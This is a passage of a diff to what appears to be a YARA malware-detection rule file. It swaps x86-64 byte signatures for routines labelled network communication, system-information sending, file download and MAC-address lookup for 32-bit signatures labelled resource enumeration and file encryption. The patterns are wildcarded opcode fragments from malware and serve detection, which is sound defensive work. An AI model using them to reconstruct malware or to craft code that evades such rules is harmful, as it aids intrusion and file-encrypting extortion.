-            48 81 C4 ?? ?? ?? ?? 90 C3 44 0F 11 7C 24 ?? 48 8B 40 ?? E8 ?? ?? ?? ?? 48 8D 0D ??
-            ?? ?? ?? 48 89 4C 24 ?? 48 89 44 24 ?? 48 8D 05 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 8D 4C
-            24 ?? BF ?? ?? ?? ?? 48 89 FE E8 ?? ?? ?? ?? 31 C9 48 89 C7 48 89 DE 31 C0 48 89 CB
-            48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 31 C0 48 89 DF 48 89 CE 31 DB 48 89
-            D9 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 48 89 44 24 ?? 48 89 5C 24 ?? 48
-            89 4C 24 ?? 48 89 7C 24 ?? 48 89 74 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 5C 24
-            ?? 48 8B 4C 24 ?? 48 8B 7C 24 ?? 48 8B 74 24
+		$enum_resources_p1 = {
+            55 89 E5 81 EC ?? ?? ?? ?? 8D 45 ?? 89 65 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8D 45 ?? C7 45 ??
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44
+            24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 EC ?? 85 C0 74 ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45
+            ?? C9 C2 ?? ?? 8B 45 ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? C7 45 ?? ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 83 EC ?? 85 C0 89 85 ?? ?? ?? ?? 74 ?? 90 8D B4 26 ?? ?? ?? ?? 8B 45 ?? C7
+            44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D 55 ??
+            89 54 24 ?? 8B 85 ?? ?? ?? ?? 8D 55 ?? 89 54 24 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 C7
+            45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 74 ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7
+            45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 EC ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ??
+            85 C0 0F 94 C0 0F B6 C0 89 45 ?? E9 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B
         }
-		$network_communication_v2 = {
-            64 48 8B 0C 25 ?? ?? ?? ?? 48 3B 61 ?? 0F 86 ?? ?? ?? ?? 48 83 EC ?? 48 89 6C 24 ??
-            48 8D 6C 24 ?? 0F 57 C0 0F 11 44 24 ?? 0F 11 44 24 ?? 48 8B 44 24 ?? 48 8B 08 48 8B
-            51 ?? 48 8B 49 ?? 48 89 14 24 48 89 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8D 0D
-            ?? ?? ?? ?? 48 89 4C 24 ?? 48 89 44 24 ?? 48 8B 44 24 ?? 48 8B 10 48 8B 9A ?? ?? ??
-            ?? 48 8B 92 ?? ?? ?? ?? 48 89 1C 24 48 89 54 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48
-            8D 0D ?? ?? ?? ?? 48 89 4C 24 ?? 48 89 44 24 ?? 48 8D 44 24 ?? 48 89 04 24 48 C7 44
-            24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 44
-            24 ?? 48 8B 4C 24 ?? 48 89 4C 24 ?? 48 C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44
-            24 ?? 80 78 ?? ?? 75 ?? 80 78 ?? ?? 74 ?? C7 04 24 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ??
-            48 89 4C 24 ?? 48 89 44 24 ?? 48 8B 54 24 ?? 48 89 54 24 ?? 48 8B 5C 24 ?? 48 89 5C
-            24 ?? E8 ?? ?? ?? ?? 48 8B 44 24
+		$enum_resources_p2 = {
+            85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 45 ?? EB ?? 8B 45 ?? 8B 40 ?? 89 85
+            ?? ?? ?? ?? 83 E0 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 83 85 ?? ?? ?? ?? ?? 83 45 ?? ?? 8B
+            85 ?? ?? ?? ?? 39 45 ?? 0F 86 ?? ?? ?? ?? 8B 45 ?? F6 40 ?? ?? 74 ?? 8D 45 ?? 8B 4D
+            ?? 89 45 ?? 8B 45 ?? 8B 51 ?? 8D 4D ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 45 ?? ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 83 EC ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? 8B 45 ??
+            89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? 83 EC ?? 39 D0 0F 84
+            ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D B4 26 ?? ?? ?? ?? 8D 45 ?? 8B
+            4D ?? 89 45 ?? 8B 45 ?? 8B 51 ?? 8D 4D ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 45 ??
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 EC ?? 8B 40 ?? 89 C2 89 85 ?? ?? ?? ?? 8D 45
+            ?? 85 D2 89 45 ?? B8 ?? ?? ?? ?? 74 ?? 89 14 24 E8 ?? ?? ?? ?? 03 85 ?? ?? ?? ?? 89
+            44 24 ?? 8B 85 ?? ?? ?? ?? 8D 4D ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
+            45 ?? 83 EC ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? 8D 45 ?? 89 04 24 C7 45 ?? ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8D
+            55 ?? 39 D0 0F 84 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? E9
         }
-		$send_system_information_v2 = {
-            64 48 8B 0C 25 ?? ?? ?? ?? 48 8D 44 24 ?? 48 3B 41 ?? 0F 86 ?? ?? ?? ?? 48 81 EC ??
-            ?? ?? ?? 48 89 AC 24 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48
-            8B 48 ?? 48 8B 11 48 8B 49 ?? 48 8B 52 ?? 48 89 0C 24 FF D2 48 8B 44 24 ?? 48 8B 4C
-            24 ?? 48 83 7C 24 ?? ?? 0F 1F 40 ?? 0F 85 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 48 89 04
-            24 E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 8B 54 24 ?? 48 8B 5C 24 ?? 48 8B
-            74 24 ?? 48 83 7C 24 ?? ?? 0F 85 ?? ?? ?? ?? 48 89 54 24 ?? 48 89 5C 24 ?? 48 89 74
-            24 ?? 0F 57 C0 0F 11 44 24 ?? 0F 11 84 24 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B
-            08 48 8B 51 ?? 48 8B 49 ?? 48 89 14 24 48 89 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ??
-            48 8D 0D ?? ?? ?? ?? 48 89 4C 24 ?? 48 89 44 24 ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 10
-            48 8B 9A ?? ?? ?? ?? 48 8B 92 ?? ?? ?? ?? 48 89 1C 24 48 89 54 24 ?? E8 ?? ?? ?? ??
-            48 8B 44 24 ?? 48 8D 0D ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ??
-            48 8D 44 24 ?? 48 89 04 24 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 48 ?? 48 8B 40 ?? 48 8B 49 ?? 48 89 04 24
-            48 8D 05 ?? ?? ?? ?? 48 89 44 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 8B 44 24 ?? 48 89
-            44 24 ?? 48 8B 44 24 ?? 48 89 44 24 ?? 48 8B 44 24 ?? 48 89 44 24 ?? 90 FF D1 48 8B
-            44 24 ?? 48 8B 4C 24 ?? 48 8B 54 24 ?? 48 83 7C 24 ?? ?? 75 ?? 48 81 78 ?? ?? ?? ??
-            ?? 74 ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 94 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48
-            81 C4 ?? ?? ?? ?? C3 0F 57 C0 0F 11 84 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 81
-            C4 ?? ?? ?? ?? C3 48 89 8C 24 ?? ?? ?? ?? 48 89 94 24 ?? ?? ?? ?? 48 8B AC 24 ?? ??
-            ?? ?? 48 81 C4 ?? ?? ?? ?? C3 48 89 84 24 ?? ?? ?? ?? 48 89 8C 24
+		$encrypt_files_p1 = {
+            55 89 E5 81 EC ?? ?? ?? ?? 8D 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ??
+            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 A5 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ??
+            C6 45 ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6
+            45 ?? ?? C7 45 ?? ?? ?? ?? ?? 03 48 ?? 89 85 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 01 C7 04 24 ?? ?? ?? ?? C7 85
+            ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 83 EC ?? C7 85 ?? ?? ?? ??
+            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 4D ?? 83 EC ?? 89 85 ?? ?? ?? ?? 8B 45 ?? 8B 51 ?? 8D
+            8D ?? ?? ?? ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ??
+            ?? ?? ?? B8 ?? ?? ?? ?? 2B 85 ?? ?? ?? ?? 83 EC ?? 83 F8 ?? 0F 86 ?? ?? ?? ?? 8D 8D
+            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 8D ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 8D 8D ?? ??
+            ?? ?? 8B 85 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 03 48 ?? C7 04 24 ?? ?? ?? ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 83 EC ?? 39 D0
+            74 ?? 89 04 24 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ??
+            ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8B
         }
-		$download_file_v2_p1 = {
-            64 48 8B 0C 25 ?? ?? ?? ?? 48 8D 44 24 ?? 48 3B 41 ?? 0F 86 ?? ?? ?? ?? 48 81 EC ??
-            ?? ?? ?? 48 89 AC 24 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48
-            89 04 24 48 8B 8C 24 ?? ?? ?? ?? 48 89 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89
-            44 24 ?? 48 8B 4C 24 ?? 48 89 4C 24 ?? 0F 57 C0 0F 11 84 24 ?? ?? ?? ?? 0F 11 84 24
-            ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8B 5A ?? 48 8B 72 ?? 48 89 1C 24 48 89 74 24
-            ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8D 0D ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89
-            84 24 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 90 ?? ?? ?? ?? 48 8B 80 ?? ?? ?? ??
-            48 89 14 24 48 89 44 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8D 0D ?? ?? ?? ?? 48 89
-            8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 48 89 04 24 48 C7
-            44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B
-            4C 24 ?? 0F 57 C0 0F 11 44 24 ?? 0F 11 84 24 ?? ?? ?? ?? 48 89 04 24 48 89 4C 24 ??
-            E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8D 0D ?? ?? ?? ?? 48 89 4C 24 ?? 48 89 84 24 ?? ??
-            ?? ?? 48 8B 44 24 ?? 48 89 04 24 48 8B 54 24 ?? 48 89 54 24 ?? E8 ?? ?? ?? ?? 48 8B
-            44 24 ?? 48 8D 0D ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8D
-            05 ?? ?? ?? ?? 48 89 04 24 48 C7 44 24 ?? ?? ?? ?? ?? 48 8D 44 24 ?? 48 89 44 24 ??
-            48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ??
-            48 8B 4C 24 ?? 48 8B 94 24 ?? ?? ?? ?? 48 8B 52 ?? 48 8B 9C 24 ?? ?? ?? ?? 48 89 1C
-            24 48 8D 1D ?? ?? ?? ?? 48 89 5C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 89 44 24 ?? 48
-            89 4C 24 ?? 0F 57 C0 0F 11 44 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? FF D2 48 8B 44 24
+		$encrypt_files_p2 = {
+            40 ?? 89 44 24 ?? 8B 45 ?? 8B 00 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ??
+            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85
+            ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ??
+            ?? A1 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 40 ?? 89 94 05 ?? ?? ?? ??
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? C9 C3 03 48 ?? 8B 41 ?? 83 C8 ?? 89 04 24 C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ??
+            ?? 03 48 ?? 8B 41 ?? 83 C8 ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ??
+            83 EC ?? E9 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 83 C5 ?? 83 BD ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 77 ?? 8B 85
+            ?? ?? ?? ?? FF 24 85 ?? ?? ?? ?? 0F 0B 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 39 D0 74
+            ?? 89 04 24 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D
+            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 15 ?? ??
+            ?? ?? 8B 40 ?? 89 94 05 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85
         }
-		$download_file_v2_p2 = {
-            48 8B 4C 24 ?? 48 8B 54 24 ?? 48 83 7C 24 ?? ?? 0F 85 ?? ?? ?? ?? 48 81 78 ?? ?? ??
-            ?? ?? 0F 85 ?? ?? ?? ?? 48 8B 08 48 8B 50 ?? 48 8B 40 ?? 48 8B 9C 24 ?? ?? ?? ?? 48
-            89 1C 24 48 8B 9C 24 ?? ?? ?? ?? 48 89 5C 24 ?? 48 89 4C 24 ?? 48 89 54 24 ?? 48 89
-            44 24 ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 83
-            7C 24 ?? ?? 74 ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 0F 57 C0 0F 11 84 24 ?? ?? ??
-            ?? 48 89 84 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4
-            ?? ?? ?? ?? C3 48 C7 04 24 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 44 24 ?? 48 8B 44 24 ??
-            48 89 44 24 ?? 0F 1F 00 E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 8B 54 24 ??
-            48 89 84 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 94 24 ?? ?? ?? ?? 0F 57 C0 0F
-            11 84 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 0F 57 C0 0F 11
-            44 24 ?? 48 8B 40 ?? 48 89 04 24 E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8D 0D ?? ?? ?? ??
-            48 89 4C 24 ?? 48 89 44 24 ?? 48 8D 05 ?? ?? ?? ?? 48 89 04 24 48 C7 44 24 ?? ?? ??
-            ?? ?? 48 8D 44 24 ?? 48 89 44 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ??
-            ?? 0F 57 C0 0F 11 84 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ??
-            48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ??
-            0F 57 C0 0F 11 84 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 94 24 ?? ?? ?? ?? 48
-            8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3
+		$encrypt_files_p3 = {
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ??
+            ?? ?? 8B 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 40 ?? 89 94 05 ?? ?? ?? ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89
+            04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D B4 26 ?? ?? ?? ?? 55 89 E5 81
+            EC ?? ?? ?? ?? 8D 45 ?? 89 65 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8D 45 ?? 8B 4D ?? 89 45 ?? 8B
+            45 ?? 8B 51 ?? 8D 4D ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 45 ?? ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8D 45 ?? 83 EC ?? 89 44 24 ?? 8D 45 ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8D 4D ?? C7 04 24 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ??
+            8B 45 ?? 8D 55 ?? 83 EC ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? 39
         }
-		$network_communication_v3 = {
-            49 3B 66 ?? 76 ?? 48 83 EC ?? 48 89 6C 24 ?? 48 8D 6C 24 ?? 4D 8B 66 ?? 0F 1F 84 00
-            ?? ?? ?? ?? 4D 85 E4 0F 85 ?? ?? ?? ?? 48 89 5C 24 ?? 48 89 7C 24 ?? 4C 89 84 24 ??
-            ?? ?? ?? 48 89 44 24 ?? 48 85 C0 74 ?? 48 8B 10 4C 8B 60 ?? 48 89 D0 4D 89 D3 4D 89
-            CA 4D 89 C1 49 89 F0 48 89 FE 48 89 CF 48 89 D9 4C 89 E3 E8 ?? ?? ?? ?? 48 8B 6C 24
-            ?? 48 83 C4 ?? C3 E8 ?? ?? ?? ?? 90 48 89 44 24 ?? 48 89 5C 24 ?? 48 89 4C 24 ?? 48
-            89 7C 24 ?? 48 89 74 24 ?? 4C 89 44 24 ?? 4C 89 4C 24 ?? 4C 89 54 24 ?? E8 ?? ?? ??
-            ?? 48 8B 44 24 ?? 48 8B 5C 24 ?? 48 8B 4C 24 ?? 48 8B 7C 24 ?? 48 8B 74 24 ?? 4C 8B
-            44 24 ?? 4C 8B 4C 24 ?? 4C 8B 54 24 ?? E9 ?? ?? ?? ?? 4C 8D 6C 24 ?? 0F 1F 44 00 ??
-            4D 39 2C 24 0F 85 ?? ?? ?? ?? 49 89 24 24
+		$encrypt_files_p4 = {
+            D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 55 ?? 85 D2 75 ?? C6 45 ?? ?? 8D 45 ?? 89 04 24
+            E8 ?? ?? ?? ?? 0F B6 45 ?? C9 C3 8D 45 ?? 8B 4D ?? 89 45 ?? 8B 45 ?? 8B 51 ?? 8D 4D
+            ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 83
+            EC ?? 89 44 24 ?? 8D 45 ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? C7
+            04 24 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8D 55 ?? 83
+            EC ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8D 4D ?? 39 C8 74 ?? 89 04 24 E8
+            ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 8B 4D ?? 89 45 ?? 8B 45 ?? 8B
+            51 ?? 8D 4D ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8D 45 ?? 83 EC ?? 89 44 24 ?? 8D 45 ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8D 4D ?? C7 04 24 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ??
+            8D 55 ?? 83 EC ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? 39 D0 74 ??
+            89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 8B 4D ?? 89 45
         }
-		$get_mac_address_v3 = {
-            4C 8D 64 24 ?? 4D 3B 66 ?? 0F 86 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 89 AC 24 ?? ??
-            ?? ?? 48 8D AC 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 85 FF 75 ?? 48 85 DB 7E ?? 48 89 5C
-            24 ?? 31 C9 31 D2 31 F6 31 FF EB ?? 31 C0 31 C9 EB ?? 31 C0 31 DB 48 89 F9 48 89 F7
-            48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 48 85 C0 75 ?? 31 C0 31 DB 31 C9 48
-            89 C7 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 48 8B 01 48 8B 59 ?? 31 C9 31
-            FF 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 4C 8B 54 24 ?? 49 8D 42 ?? 4C 89
-            C1 48 89 D3 48 89 FA 48 89 DF 48 89 4C 24 ?? 48 89 44 24 ?? 48 89 54 24 ?? 48 89 7C
-            24 ?? 48 89 74 24 ?? 0F 10 00 0F 11 84 24 ?? ?? ?? ?? 0F 10 40 ?? 0F 11 84 24 ?? ??
-            ?? ?? 0F 10 40 ?? 0F 11 84 24 ?? ?? ?? ?? 0F 10 40 ?? 0F 11 84 24 ?? ?? ?? ?? 4C 8B
-            84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 4C 8B 8C 24 ?? ?? ?? ?? 4C 89 C0 4C 89 C9
-            E8 ?? ?? ?? ?? 0F 1F 00 48 85 DB 74 ?? 48 8B 4C 24 ?? 48 8D 71 ?? 48 8B 7C 24 ?? 48
-            39 F7 72 ?? 48 8B 54 24 ?? EB ?? 48 89 5C 24 ?? 48 89 44 24 ?? 48 8D 05 ?? ?? ?? ??
-            48 8B 5C 24 ?? E8 ?? ?? ?? ?? 48 8D 73 ?? 48 8B 5C 24 ?? 48 89 C2 48 89 CF 48 8B 44
-            24 ?? 48 8B 4C 24 ?? 48 C1 E1 ?? 48 89 5C 0A ?? 4C 8D 04 0A 83 3D ?? ?? ?? ?? ?? 75
-            ?? 48 89 04 0A EB ?? 48 89 F9 4C 89 C7 E8 ?? ?? ?? ?? 48 89 CF EB ?? 48 8B 74 24 ??
-            48 8B 54 24 ?? 48 8B 7C 24 ?? 4C 8B 44 24 ?? 49 FF C0 4C 8B 4C 24 ?? 0F 1F 44 00 ??
-            4D 39 C1 0F 8F ?? ?? ?? ?? 48 89 F0 48 89 D1 E9
+		$encrypt_files_p5 = {
+            8B 45 ?? 8B 51 ?? 8D 4D ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 45 ?? ?? ?? ?? ?? E8
